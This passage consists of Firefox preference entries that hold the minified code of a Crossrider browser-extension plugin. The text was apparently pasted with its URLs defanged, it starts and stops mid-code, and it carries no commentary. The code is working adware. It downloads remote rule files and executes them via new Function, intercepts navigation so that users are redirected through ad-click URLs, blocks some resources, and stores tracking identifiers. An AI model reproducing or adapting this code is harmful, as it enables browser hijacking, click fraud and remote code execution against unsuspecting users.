b=document.getElementsByTagName(\&quot;head\&quot;),b=b.length&gt;0?b:document.getElementsByTagName(\&quot;body\&quot;);if(b.length&gt;0){var d=document.createElement(\&quot;script\&quot;);d.async=\ntrue;d.type=\&quot;text/javascript\&quot;;d.src=a;b[0].appendChild(d)}},formatDate:function(a){var a=parseInt(a),b=new Date(parseInt(a)*1E3),a=b.getDate(),d=b.getMonth(),b=b.getFullYear();return[\&quot;Jan\&quot;,\&quot;Feb\&quot;,\&quot;Mar\&quot;,\&quot;Apr\&quot;,\&quot;May\&quot;,\&quot;Jun\&quot;,\&quot;Jul\&quot;,\&quot;Aug\&quot;,\&quot;Sep\&quot;,\&quot;Oct\&quot;,\&quot;Nov\&quot;,\&quot;Dec\&quot;][d]+\&quot; \&quot;+a+\&quot;, \&quot;+b},loadParams:function(){(this.params=appAPI.db.get(this.keys.INSTALLER_PARAMS))&amp;&amp;appAPI.db.set(this.keys.INSTALLER_PARAMS_BACKUP,this.params);this.params=this.params||{};if(!this.params.uzid||this.params.uzid==\&quot;0\&quot;)this.params.uzid=\n\&quot;14019&amp;pid=\&quot;+this.vars.pid},loadAOI:function(){var a=appAPI.db.get(this.keys.INSTALLATION_TIME),a=a&amp;&amp;a!=\&quot;0\&quot;?a:appAPI.db.get(this.keys.AOI);if(!a||a==\&quot;0\&quot;)a=\&quot;\&quot;+Math.floor((new Date).getTime()/1E3);appAPI.db.set(this.keys.AOI,a);this.vars.aoi=a},loadZone:function(){var a=appAPI.db.get(this.keys.ZONEID);if(!a||a==\&quot;0\&quot;)a=this.params.uzid;typeof a==\&quot;string\&quot;&amp;&amp;a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.split(\&quot;&amp;\&quot;)[0]);appAPI.db.set(this.keys.ZONEID,a);this.vars.zoneid=a;a=appAPI.db.get(this.keys.PARENT_ZONEID);if(!a||a==\&quot;0\&quot;){(a=\nthis.params.uzid?this.params.uzid:appAPI.db.get(this.keys.PARENT_ZONEID))&amp;&amp;a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.split(\&quot;&amp;\&quot;)[0]);appAPI.db.set(this.keys.PARENT_ZONEID,a)}this.parent_zoneid=a},loadPID:function(){var a=appAPI.db.get(this.keys.PRODUCTID);if((!a||a==\&quot;0\&quot;)&amp;&amp;typeof this.params.uzid==\&quot;string\&quot;&amp;&amp;this.params.uzid.indexOf(\&quot;pid=\&quot;)!=-1){a=this.params.uzid.substring(this.params.uzid.indexOf(\&quot;pid=\&quot;)+4);a.indexOf(\&quot;&amp;\&quot;)!=-1&amp;&amp;(a=a.substring(0,a.indexOf(\&quot;&amp;\&quot;)));appAPI.db.set(this.keys.PRODUCTID,a)}this.vars.pid=a||\nthis.vars.pid},loadExtras:function(){if(appAPI.db.get(this.keys.BGCODE)!=null)this.vars.crr=Math.floor((new Date).getTime()/1E3);if(this.params&amp;&amp;(this.params.uzid&amp;&amp;this.params.uzid!=\&quot;0\&quot;)&amp;&amp;(this.parent_zoneid&amp;&amp;this.parent_zoneid!=\&quot;0\&quot;&amp;&amp;this.params.uzid.indexOf(this.parent_zoneid)!=0||this.vars.pid&amp;&amp;this.vars.pid!=\&quot;0\&quot;&amp;&amp;this.params.uzid.indexOf(\&quot;pid=\&quot;+this.vars.pid)==-1||this.parent_zoneid&amp;&amp;this.vars.zoneid&amp;&amp;this.parent_zoneid==this.vars.zoneid||!this.parent_zoneid||this.parent_zoneid==\&quot;0\&quot;)){this.zoneFix();\nreturn false}return true},zoneFix:function(){this.recreate_child=true;appAPI.db.set(this.keys.ZONEID,\&quot;0\&quot;);appAPI.db.set(this.keys.PARENT_ZONEID,\&quot;0\&quot;);appAPI.db.set(this.keys.PRODUCTID,\&quot;0\&quot;);_GPL_PLUGIN.timer=setInterval(function(){if(appAPI.db.get(_GPL_PLUGIN.keys.ZONEID)==\&quot;0\&quot;){clearInterval(_GPL_PLUGIN.timer);_GPL_PLUGIN.loadEssentials();_GPL_PLUGIN.loadFinal()}},250)},createChild:function(){var a=\&quot;hxxp://cdnapps-a.akamaihd.net/tb/gz.php?keyset_id=\&quot;+escape(this.formatDate(this.vars.aoi))+\&quot;&amp;xml&amp;rev=0&amp;parent_zone=\&quot;+\nparseInt(this.parent_zoneid)+\&quot;&amp;is_date\&quot;;appAPI.request.get(a,function(a){if(a==\&quot;\&quot;)_GPL_PLUGIN.vars.zoneid=12199;else{a=(doc=a.match(/zoneid&gt;(\\d+)&lt;/i))?doc[1]:0;if(parseInt(a)&gt;0){appAPI.db.set(_GPL_PLUGIN.keys.ZONEID,\&quot;\&quot;+a);appAPI.db.set(_GPL_PLUGIN.keys.CHILD_CREATED,\&quot;1\&quot;);_GPL_PLUGIN.vars.zoneid=a}else _GPL_PLUGIN.vars.zoneid=12199}_GPL_PLUGIN.init()},function(){_GPL_PLUGIN.init()})},getDomainVariations:function(a){var b=[],a=a.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),d=a.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?\n3:2;do{var c=a.join(\&quot;.\&quot;);b.push(c);a.shift()}while(a.length&gt;=d);return b}};&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.name&quot;, &quot;GPL Plugin (Loader)&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000014.ver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.code&quot;, &quot;var _GPL_BG={vars:{},rules:{},started:!1,log:function(d){console.log(d)},factor:1,preinit:function(){null!=appAPI.db.get(\&quot;_GPL_zoneid\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_product_id\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_aoi\&quot;)?(_GPL_BG.vars.zoneid=appAPI.db.get(\&quot;_GPL_zoneid\&quot;),_GPL_BG.vars.pid=appAPI.db.get(\&quot;_GPL_product_id\&quot;),_GPL_BG.vars.aoi=parseInt(appAPI.db.get(\&quot;_GPL_aoi\&quot;)),appAPI.db.set(\&quot;_GPL_crr\&quot;,Math.floor((new Date).getTime()/1E3)),_GPL_BG.init()):setTimeout(function(){_GPL_BG.preinit()},1E3)},init:function(){var d=\nappAPI.db.get(\&quot;_GPL_country_code\&quot;);!d||\&quot;\&quot;==d?appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/loaders/cid?r=\&quot;+(new Date).getTime(),function(d){if(\&quot;\&quot;==d)setTimeout(function(){_GPL_BG.init()},1E4);else try{var a=(new Function(\&quot;return \&quot;+d.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();a&amp;&amp;(a.cid&amp;&amp;\&quot;\&quot;!=a.cid)&amp;&amp;(appAPI.db.set(\&quot;_GPL_country_code\&quot;,a.cid,appAPI.time.daysFromNow(7)),_GPL_BG.vars.cid=a.cid,_GPL_BG.loadRules())}catch(b){setTimeout(function(){_GPL_BG.init()},1E4)}},function(){setTimeout(function(){_GPL_BG.init()},\n1E4)}):(_GPL_BG.vars.cid=d,_GPL_BG.loadRules());setInterval(function(){_GPL_BG.factor=1;_GPL_BG.loadRules()},108E5)},loadRules:function(){appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/srr/\&quot;+_GPL_BG.vars.cid+\&quot;/?r=\&quot;+(new Date).getTime(),function(d){if(d=(new Function(\&quot;return \&quot;+d))())_GPL_BG.rules=d,_GPL_BG.started||_GPL_BG.vars.pid in _GPL_BG.rules.p&amp;&amp;Math.floor((new Date).getTime()/1E3)-_GPL_BG.vars.aoi&gt;=parseInt(_GPL_BG.rules.p[_GPL_BG.vars.pid].min)&amp;&amp;_GPL_BG.captureRequests()},function(){setTimeout(function(){_GPL_BG.loadRules();\n_GPL_BG.factor*=2},6E4*_GPL_BG.factor)})},captureRequests:function(){_GPL_BG.started=!0;appAPI.onRequest(function(d,h){var a;if(null==appAPI.db.get(\&quot;_GPL_sr_halt\&quot;)&amp;&amp;(h&amp;&amp;(-1==h.indexOf(\&quot;://\&quot;)&amp;&amp;(h=\&quot;hxxp://\&quot;+h),a=_GPL_BG.processRequest(\&quot;nav\&quot;,_GPL_BG.parse_url(h),h))||d&amp;&amp;(-1==d.indexOf(\&quot;://\&quot;)&amp;&amp;(d=\&quot;hxxp://\&quot;+d),a=_GPL_BG.processRequest(\&quot;resource\&quot;,_GPL_BG.parse_url(d),d))))return a})},processRequest:function(d,h,a){if(!h.host||null!=appAPI.db.get(\&quot;_GPL_crrs\&quot;))return!1;h=_GPL_BG.getRules(h,d);if(0==h.length)return!1;\nif(\&quot;nav\&quot;==d)return d=h[Math.floor(Math.random()*h.length)],appAPI.db.set(\&quot;_GPL_sr[\&quot;+d.d+\&quot;]\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.hoursFromNow(parseInt(d.h))),appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.minutesFromNow(15)),{redirectTo:_GPL_BG.getClickUrl(a)};if(\&quot;resource\&quot;==d)return{cancel:!0}},getRules:function(d,h){var a=[],b=\&quot;nav\&quot;==h?_GPL_BG.getDomainVariations(d.host):[d.host.toLowerCase()],f=((d.path?d.path:\&quot;\&quot;)+(d.query?\&quot;?\&quot;+d.query:\&quot;\&quot;)+(d.fragment?\n\&quot;#\&quot;+d.fragment:\&quot;\&quot;)).toLowerCase(),c;if(!b||0==b.length)return a;for(var e=0,m=b.length;e&lt;m;e++){var g=this.MD5.md5(b[e]);if(_GPL_BG.rules[g])for(var i=0,l=_GPL_BG.rules[g].length;i&lt;l;i++)_GPL_BG.rules[g][i].t==h&amp;&amp;f.match(_GPL_BG.rules[g][i].k.toLowerCase())&amp;&amp;(_GPL_BG.rules[g][i].d=b[e],\&quot;resource\&quot;==h?a.push(_GPL_BG.rules[g][i]):(c=appAPI.db.get(\&quot;_GPL_sr[\&quot;+b[e]+\&quot;]\&quot;),null==c&amp;&amp;a.push(_GPL_BG.rules[g][i])))}return a},getClickUrl:function(d){return\&quot;https://clicks.ads2srv.com/click?sr=\&quot;+escape(d).replace(/\\//g,\n\&quot;%2F\&quot;)+\&quot;&amp;zone=\&quot;+escape(_GPL_BG.vars.zoneid)},getDomainVariations:function(d){var d=d.toLowerCase(),h=[],d=d.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),a=d.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?3:2;do{var b=d.join(\&quot;.\&quot;);h.push(b);d.shift()}while(d.length&gt;=a);return h},MD5:{hexcase:0,b64pad:\&quot;\&quot;,md5:function(d){return this.rstr2hex(this.rstr_md5(this.str2rstr_utf8(d)))},rstr_md5:function(d){return this.binl2rstr(this.binl_md5(this.rstr2binl(d),8*d.length))},rstr2hex:function(d){for(var h=this.hexcase?\n\&quot;0123456789ABCDEF\&quot;:\&quot;0123456789abcdef\&quot;,a=\&quot;\&quot;,b,f=0;f&lt;d.length;f++)b=d.charCodeAt(f),a+=h.charAt(b&gt;&gt;&gt;4&amp;15)+h.charAt(b&amp;15);return a},str2rstr_utf8:function(d){for(var h=\&quot;\&quot;,a=-1,b,f;++a&lt;d.length;)b=d.charCodeAt(a),f=a+1&lt;d.length?d.charCodeAt(a+1):0,55296&lt;=b&amp;&amp;56319&gt;=b&amp;&amp;(56320&lt;=f&amp;&amp;57343&gt;=f)&amp;&amp;(b=65536+((b&amp;1023)&lt;&lt;10)+(f&amp;1023),a++),127&gt;=b?h+=String.fromCharCode(b):2047&gt;=b?h+=String.fromCharCode(192|b&gt;&gt;&gt;6&amp;31,128|b&amp;63):65535&gt;=b?h+=String.fromCharCode(224|b&gt;&gt;&gt;12&amp;15,128|b&gt;&gt;&gt;6&amp;63,128|b&amp;63):2097151&gt;=b&amp;&amp;(h+=String.fromCharCode(240|\nb&gt;&gt;&gt;18&amp;7,128|b&gt;&gt;&gt;12&amp;63,128|b&gt;&gt;&gt;6&amp;63,128|b&amp;63));return h},rstr2binl:function(d){for(var h=Array(d.length&gt;&gt;2),a=0;a&lt;h.length;a++)h[a]=0;for(a=0;a&lt;8*d.length;a+=8)h[a&gt;&gt;5]|=(d.charCodeAt(a/8)&amp;255)&lt;&lt;a%32;return h},binl2rstr:function(d){for(var h=\&quot;\&quot;,a=0;a&lt;32*d.length;a+=8)h+=String.fromCharCode(d[a&gt;&gt;5]&gt;&gt;&gt;a%32&amp;255);return h},binl_md5:function(d,h){d[h&gt;&gt;5]|=128&lt;&lt;h%32;d[(h+64&gt;&gt;&gt;9&lt;&lt;4)+14]=h;for(var a=1732584193,b=-271733879,f=-1732584194,c=271733878,e=0;e&lt;d.length;e+=16)var m=a,g=b,i=f,l=c,a=this.md5_ff(a,\nb,f,c,d[e+0],7,-680876936),c=this.md5_ff(c,a,b,f,d[e+1],12,-389564586),f=this.md5_ff(f,c,a,b,d[e+2],17,606105819),b=this.md5_ff(b,f,c,a,d[e+3],22,-1044525330),a=this.md5_ff(a,b,f,c,d[e+4],7,-176418897),c=this.md5_ff(c,a,b,f,d[e+5],12,1200080426),f=this.md5_ff(f,c,a,b,d[e+6],17,-1473231341),b=this.md5_ff(b,f,c,a,d[e+7],22,-45705983),a=this.md5_ff(a,b,f,c,d[e+8],7,1770035416),c=this.md5_ff(c,a,b,f,d[e+9],12,-1958414417),f=this.md5_ff(f,c,a,b,d[e+10],17,-42063),b=this.md5_ff(b,f,c,a,d[e+11],22,-1990404162),\na=this.md5_ff(a,b,f,c,d[e+12],7,1804603682),c=this.md5_ff(c,a,b,f,d[e+13],12,-40341101),f=this.md5_ff(f,c,a,b,d[e+14],17,-1502002290),b=this.md5_ff(b,f,c,a,d[e+15],22,1236535329),a=this.md5_gg(a,b,f,c,d[e+1],5,-165796510),c=this.md5_gg(c,a,b,f,d[e+6],9,-1069501632),f=this.md5_gg(f,c,a,b,d[e+11],14,643717713),b=this.md5_gg(b,f,c,a,d[e+0],20,-373897302),a=this.md5_gg(a,b,f,c,d[e+5],5,-701558691),c=this.md5_gg(c,a,b,f,d[e+10],9,38016083),f=this.md5_gg(f,c,a,b,d[e+15],14,-660478335),b=this.md5_gg(b,f,\nc,a,d[e+4],20,-405537848),a=this.md5_gg(a,b,f,c,d[e+9],5,568446438),c=this.md5_gg(c,a,b,f,d[e+14],9,-1019803690),f=this.md5_gg(f,c,a,b,d[e+3],14,-187363961),b=this.md5_gg(b,f,c,a,d[e+8],20,1163531501),a=this.md5_gg(a,b,f,c,d[e+13],5,-1444681467),c=this.md5_gg(c,a,b,f,d[e+2],9,-51403784),f=this.md5_gg(f,c,a,b,d[e+7],14,1735328473),b=this.md5_gg(b,f,c,a,d[e+12],20,-1926607734),a=this.md5_hh(a,b,f,c,d[e+5],4,-378558),c=this.md5_hh(c,a,b,f,d[e+8],11,-2022574463),f=this.md5_hh(f,c,a,b,d[e+11],16,1839030562),\nb=this.md5_hh(b,f,c,a,d[e+14],23,-35309556),a=this.md5_hh(a,b,f,c,d[e+1],4,-1530992060),c=this.md5_hh(c,a,b,f,d[e+4],11,1272893353),f=this.md5_hh(f,c,a,b,d[e+7],16,-155497632),b=this.md5_hh(b,f,c,a,d[e+10],23,-1094730640),a=this.md5_hh(a,b,f,c,d[e+13],4,681279174),c=this.md5_hh(c,a,b,f,d[e+0],11,-358537222),f=this.md5_hh(f,c,a,b,d[e+3],16,-722521979),b=this.md5_hh(b,f,c,a,d[e+6],23,76029189),a=this.md5_hh(a,b,f,c,d[e+9],4,-640364487),c=this.md5_hh(c,a,b,f,d[e+12],11,-421815835),f=this.md5_hh(f,c,\na,b,d[e+15],16,530742520),b=this.md5_hh(b,f,c,a,d[e+2],23,-995338651),a=this.md5_ii(a,b,f,c,d[e+0],6,-198630844),c=this.md5_ii(c,a,b,f,d[e+7],10,1126891415),f=this.md5_ii(f,c,a,b,d[e+14],15,-1416354905),b=this.md5_ii(b,f,c,a,d[e+5],21,-57434055),a=this.md5_ii(a,b,f,c,d[e+12],6,1700485571),c=this.md5_ii(c,a,b,f,d[e+3],10,-1894986606),f=this.md5_ii(f,c,a,b,d[e+10],15,-1051523),b=this.md5_ii(b,f,c,a,d[e+1],21,-2054922799),a=this.md5_ii(a,b,f,c,d[e+8],6,1873313359),c=this.md5_ii(c,a,b,f,d[e+15],10,-30611744),\nf=this.md5_ii(f,c,a,b,d[e+6],15,-1560198380),b=this.md5_ii(b,f,c,a,d[e+13],21,1309151649),a=this.md5_ii(a,b,f,c,d[e+4],6,-145523070),c=this.md5_ii(c,a,b,f,d[e+11],10,-1120210379),f=this.md5_ii(f,c,a,b,d[e+2],15,718787259),b=this.md5_ii(b,f,c,a,d[e+9],21,-343485551),a=this.safe_add(a,m),b=this.safe_add(b,g),f=this.safe_add(f,i),c=this.safe_add(c,l);return[a,b,f,c]},md5_cmn:function(d,h,a,b,f,c){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(h,d),this.safe_add(b,c)),f),a)},md5_ff:function(d,\nh,a,b,f,c,e){return this.md5_cmn(h&amp;a|~h&amp;b,d,h,f,c,e)},md5_gg:function(d,h,a,b,f,c,e){return this.md5_cmn(h&amp;b|a&amp;~b,d,h,f,c,e)},md5_hh:function(d,h,a,b,f,c,e){return this.md5_cmn(h^a^b,d,h,f,c,e)},md5_ii:function(d,h,a,b,f,c,e){return this.md5_cmn(a^(h|~b),d,h,f,c,e)},safe_add:function(d,h){var a=(d&amp;65535)+(h&amp;65535);return(d&gt;&gt;16)+(h&gt;&gt;16)+(a&gt;&gt;16)&lt;&lt;16|a&amp;65535},bit_rol:function(d,h){return d&lt;&lt;h|d&gt;&gt;&gt;32-h}},parse_url:function(d,h){for(var a=\&quot;source scheme authority userInfo user pass host port relative path directory file query fragment\&quot;.split(\&quot; \&quot;),\nb=/^(?:([^:\\/?#]+):)?(?:\\/\\/()(?:(?:()(?:([^:@]*):?([^:@]*))?@)?([^:\\/?#]*)(?::(\\d*))?))?()(?:(()(?:(?:[^?#\\/]*\\/)*)()(?:[^?#]*))(?:\\?([^#]*))?(?:#(.*))?)/.exec(d),f={},c=14;c--;)b[c]&amp;&amp;(f[a[c]]=b[c]);if(h)return f[h.replace(\&quot;PHP_URL_\&quot;,\&quot;\&quot;).toLowerCase()];delete f.source;return f}},_GPL_BG_VARS={vars:{},rules:{}},_GPL_BG_NEW={started:!1,log:function(d){console.log(d)},factor:1,preinit:function(){null!=appAPI.db.get(\&quot;_GPL_zoneid\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_product_id\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_aoi\&quot;)?\n(_GPL_BG_VARS.vars.zoneid=appAPI.db.get(\&quot;_GPL_zoneid\&quot;),_GPL_BG_VARS.vars.pid=appAPI.db.get(\&quot;_GPL_product_id\&quot;),_GPL_BG_VARS.vars.aoi=parseInt(appAPI.db.get(\&quot;_GPL_aoi\&quot;)),appAPI.db.set(\&quot;_GPL_crr\&quot;,Math.floor((new Date).getTime()/1E3)),_GPL_BG_NEW.init()):setTimeout(function(){_GPL_BG_NEW.preinit()},1E3)},init:function(){var d=appAPI.db.get(\&quot;_GPL_country_code\&quot;);!d||\&quot;\&quot;==d?appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/loaders/cid?r=\&quot;+(new Date).getTime(),function(d){if(\&quot;\&quot;==d)setTimeout(function(){_GPL_BG_NEW.init()},\n1E4);else try{var a=(new Function(\&quot;return \&quot;+d.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();a&amp;&amp;(a.cid&amp;&amp;\&quot;\&quot;!=a.cid)&amp;&amp;(appAPI.db.set(\&quot;_GPL_country_code\&quot;,a.cid,appAPI.time.daysFromNow(7)),_GPL_BG_VARS.vars.cid=a.cid,_GPL_BG_NEW.loadRules())}catch(b){setTimeout(function(){_GPL_BG_NEW.init()},1E4)}},function(){setTimeout(function(){_GPL_BG_NEW.init()},1E4)}):(_GPL_BG_VARS.vars.cid=d,_GPL_BG_NEW.loadRules());setInterval(function(){_GPL_BG_NEW.factor=1;_GPL_BG_NEW.loadRules()},108E5)},loadRules:function(){appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/srr/\&quot;+\n_GPL_BG_VARS.vars.cid+\&quot;/?r=\&quot;+(new Date).getTime(),function(d){if(d=(new Function(\&quot;return \&quot;+d))())_GPL_BG_VARS.rules=d,_GPL_BG_NEW.started?_GPL_BG_NEW.captureRequests():_GPL_BG_VARS.vars.pid in _GPL_BG_VARS.rules.p&amp;&amp;Math.floor((new Date).getTime()/1E3)-_GPL_BG_VARS.vars.aoi&gt;=parseInt(_GPL_BG_VARS.rules.p[_GPL_BG_VARS.vars.pid].min)&amp;&amp;_GPL_BG_NEW.captureRequests()},function(){setTimeout(function(){_GPL_BG_NEW.loadRules();_GPL_BG_NEW.factor*=2},6E4*_GPL_BG_NEW.factor)})},captureRequests:function(){_GPL_BG_NEW.started&amp;&amp;\nappAPI.webRequest.onRequest.removeListener(_GPL_BG_NEW.started);_GPL_BG_NEW.started=appAPI.webRequest.onBeforeNavigate.addListener(function(d,h){var a={processRequest:function(b,f,c){appAPI.db.set(\&quot;lastrequest\&quot;,f);if(!f.host||null!=appAPI.db.get(\&quot;_GPL_crrs\&quot;))return!1;f=this.getRules(f,b);if(0==f.length)return!1;if(\&quot;nav\&quot;==b)return b=f[Math.floor(Math.random()*f.length)],appAPI.db.set(\&quot;_GPL_sr[\&quot;+b.d+\&quot;]\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.hoursFromNow(parseInt(b.h))),appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,\nMath.floor((new Date).getTime()/1E3),appAPI.time.minutesFromNow(15)),{redirectTo:this.getClickUrl(c)};if(\&quot;resource\&quot;==b)return{cancel:!0}},getRules:function(b,f){var c=[],e=\&quot;nav\&quot;==f?this.getDomainVariations(b.host):[b.host.toLowerCase()],d=((b.path?b.path:\&quot;\&quot;)+(b.query?\&quot;?\&quot;+b.query:\&quot;\&quot;)+(b.fragment?\&quot;#\&quot;+b.fragment:\&quot;\&quot;)).toLowerCase(),a;if(!e||0==e.length)return c;for(var i=0,l=e.length;i&lt;l;i++){var j=this.MD5.md5(e[i]);if(h.rules[j])for(var k=0,n=h.rules[j].length;k&lt;n;k++)h.rules[j][k].t==f&amp;&amp;d.match(h.rules[j][k].k.toLowerCase())&amp;&amp;\n(h.rules[j][k].d=e[i],\&quot;resource\&quot;==f?c.push(h.rules[j][k]):(a=appAPI.db.get(\&quot;_GPL_sr[\&quot;+e[i]+\&quot;]\&quot;),null==a&amp;&amp;c.push(h.rules[j][k])))}return c},getClickUrl:function(b){return\&quot;https://clicks.ads2srv.com/click?sr=\&quot;+escape(b).replace(/\\//g,\&quot;%2F\&quot;)+\&quot;&amp;zone=\&quot;+escape(h.vars.zoneid)},getDomainVariations:function(b){var b=b.toLowerCase(),f=[],b=b.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),c=b.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?3:2;do{var e=b.join(\&quot;.\&quot;);f.push(e);b.shift()}while(b.length&gt;=c);return f},\nMD5:{hexcase:0,b64pad:\&quot;\&quot;,md5:function(b){return this.rstr2hex(this.rstr_md5(this.str2rstr_utf8(b)))},rstr_md5:function(b){return this.binl2rstr(this.binl_md5(this.rstr2binl(b),8*b.length))},rstr2hex:function(b){for(var f=this.hexcase?\&quot;0123456789ABCDEF\&quot;:\&quot;0123456789abcdef\&quot;,c=\&quot;\&quot;,e,d=0;d&lt;b.length;d++)e=b.charCodeAt(d),c+=f.charAt(e&gt;&gt;&gt;4&amp;15)+f.charAt(e&amp;15);return c},str2rstr_utf8:function(b){for(var d=\&quot;\&quot;,c=-1,e,a;++c&lt;b.length;)e=b.charCodeAt(c),a=c+1&lt;b.length?b.charCodeAt(c+1):0,55296&lt;=e&amp;&amp;56319&gt;=e&amp;&amp;(56320&lt;=\na&amp;&amp;57343&gt;=a)&amp;&amp;(e=65536+((e&amp;1023)&lt;&lt;10)+(a&amp;1023),c++),127&gt;=e?d+=String.fromCharCode(e):2047&gt;=e?d+=String.fromCharCode(192|e&gt;&gt;&gt;6&amp;31,128|e&amp;63):65535&gt;=e?d+=String.fromCharCode(224|e&gt;&gt;&gt;12&amp;15,128|e&gt;&gt;&gt;6&amp;63,128|e&amp;63):2097151&gt;=e&amp;&amp;(d+=String.fromCharCode(240|e&gt;&gt;&gt;18&amp;7,128|e&gt;&gt;&gt;12&amp;63,128|e&gt;&gt;&gt;6&amp;63,128|e&amp;63));return d},rstr2binl:function(b){for(var d=Array(b.length&gt;&gt;2),c=0;c&lt;d.length;c++)d[c]=0;for(c=0;c&lt;8*b.length;c+=8)d[c&gt;&gt;5]|=(b.charCodeAt(c/8)&amp;255)&lt;&lt;c%32;return d},binl2rstr:function(b){for(var d=\&quot;\&quot;,c=0;c&lt;32*\nb.length;c+=8)d+=String.fromCharCode(b[c&gt;&gt;5]&gt;&gt;&gt;c%32&amp;255);return d},binl_md5:function(b,d){b[d&gt;&gt;5]|=128&lt;&lt;d%32;b[(d+64&gt;&gt;&gt;9&lt;&lt;4)+14]=d;for(var c=1732584193,e=-271733879,a=-1732584194,g=271733878,i=0;i&lt;b.length;i+=16)var h=c,j=e,k=a,n=g,c=this.md5_ff(c,e,a,g,b[i+0],7,-680876936),g=this.md5_ff(g,c,e,a,b[i+1],12,-389564586),a=this.md5_ff(a,g,c,e,b[i+2],17,606105819),e=this.md5_ff(e,a,g,c,b[i+3],22,-1044525330),c=this.md5_ff(c,e,a,g,b[i+4],7,-176418897),g=this.md5_ff(g,c,e,a,b[i+5],12,1200080426),a=this.md5_ff(a,\ng,c,e,b[i+6],17,-1473231341),e=this.md5_ff(e,a,g,c,b[i+7],22,-45705983),c=this.md5_ff(c,e,a,g,b[i+8],7,1770035416),g=this.md5_ff(g,c,e,a,b[i+9],12,-1958414417),a=this.md5_ff(a,g,c,e,b[i+10],17,-42063),e=this.md5_ff(e,a,g,c,b[i+11],22,-1990404162),c=this.md5_ff(c,e,a,g,b[i+12],7,1804603682),g=this.md5_ff(g,c,e,a,b[i+13],12,-40341101),a=this.md5_ff(a,g,c,e,b[i+14],17,-1502002290),e=this.md5_ff(e,a,g,c,b[i+15],22,1236535329),c=this.md5_gg(c,e,a,g,b[i+1],5,-165796510),g=this.md5_gg(g,c,e,a,b[i+6],9,-1069501632),\na=this.md5_gg(a,g,c,e,b[i+11],14,643717713),e=this.md5_gg(e,a,g,c,b[i+0],20,-373897302),c=this.md5_gg(c,e,a,g,b[i+5],5,-701558691),g=this.md5_gg(g,c,e,a,b[i+10],9,38016083),a=this.md5_gg(a,g,c,e,b[i+15],14,-660478335),e=this.md5_gg(e,a,g,c,b[i+4],20,-405537848),c=this.md5_gg(c,e,a,g,b[i+9],5,568446438),g=this.md5_gg(g,c,e,a,b[i+14],9,-1019803690),a=this.md5_gg(a,g,c,e,b[i+3],14,-187363961),e=this.md5_gg(e,a,g,c,b[i+8],20,1163531501),c=this.md5_gg(c,e,a,g,b[i+13],5,-1444681467),g=this.md5_gg(g,c,e,\na,b[i+2],9,-51403784),a=this.md5_gg(a,g,c,e,b[i+7],14,1735328473),e=this.md5_gg(e,a,g,c,b[i+12],20,-1926607734),c=this.md5_hh(c,e,a,g,b[i+5],4,-378558),g=this.md5_hh(g,c,e,a,b[i+8],11,-2022574463),a=this.md5_hh(a,g,c,e,b[i+11],16,1839030562),e=this.md5_hh(e,a,g,c,b[i+14],23,-35309556),c=this.md5_hh(c,e,a,g,b[i+1],4,-1530992060),g=this.md5_hh(g,c,e,a,b[i+4],11,1272893353),a=this.md5_hh(a,g,c,e,b[i+7],16,-155497632),e=this.md5_hh(e,a,g,c,b[i+10],23,-1094730640),c=this.md5_hh(c,e,a,g,b[i+13],4,681279174),\ng=this.md5_hh(g,c,e,a,b[i+0],11,-358537222),a=this.md5_hh(a,g,c,e,b[i+3],16,-722521979),e=this.md5_hh(e,a,g,c,b[i+6],23,76029189),c=this.md5_hh(c,e,a,g,b[i+9],4,-640364487),g=this.md5_hh(g,c,e,a,b[i+12],11,-421815835),a=this.md5_hh(a,g,c,e,b[i+15],16,530742520),e=this.md5_hh(e,a,g,c,b[i+2],23,-995338651),c=this.md5_ii(c,e,a,g,b[i+0],6,-198630844),g=this.md5_ii(g,c,e,a,b[i+7],10,1126891415),a=this.md5_ii(a,g,c,e,b[i+14],15,-1416354905),e=this.md5_ii(e,a,g,c,b[i+5],21,-57434055),c=this.md5_ii(c,e,a,\ng,b[i+12],6,1700485571),g=this.md5_ii(g,c,e,a,b[i+3],10,-1894986606),a=this.md5_ii(a,g,c,e,b[i+10],15,-1051523),e=this.md5_ii(e,a,g,c,b[i+1],21,-2054922799),c=this.md5_ii(c,e,a,g,b[i+8],6,1873313359),g=this.md5_ii(g,c,e,a,b[i+15],10,-30611744),a=this.md5_ii(a,g,c,e,b[i+6],15,-1560198380),e=this.md5_ii(e,a,g,c,b[i+13],21,1309151649),c=this.md5_ii(c,e,a,g,b[i+4],6,-145523070),g=this.md5_ii(g,c,e,a,b[i+11],10,-1120210379),a=this.md5_ii(a,g,c,e,b[i+2],15,718787259),e=this.md5_ii(e,a,g,c,b[i+9],21,-343485551),\nc=this.safe_add(c,h),e=this.safe_add(e,j),a=this.safe_add(a,k),g=this.safe_add(g,n);return[c,e,a,g]},md5_cmn:function(b,a,c,e,d,g){return 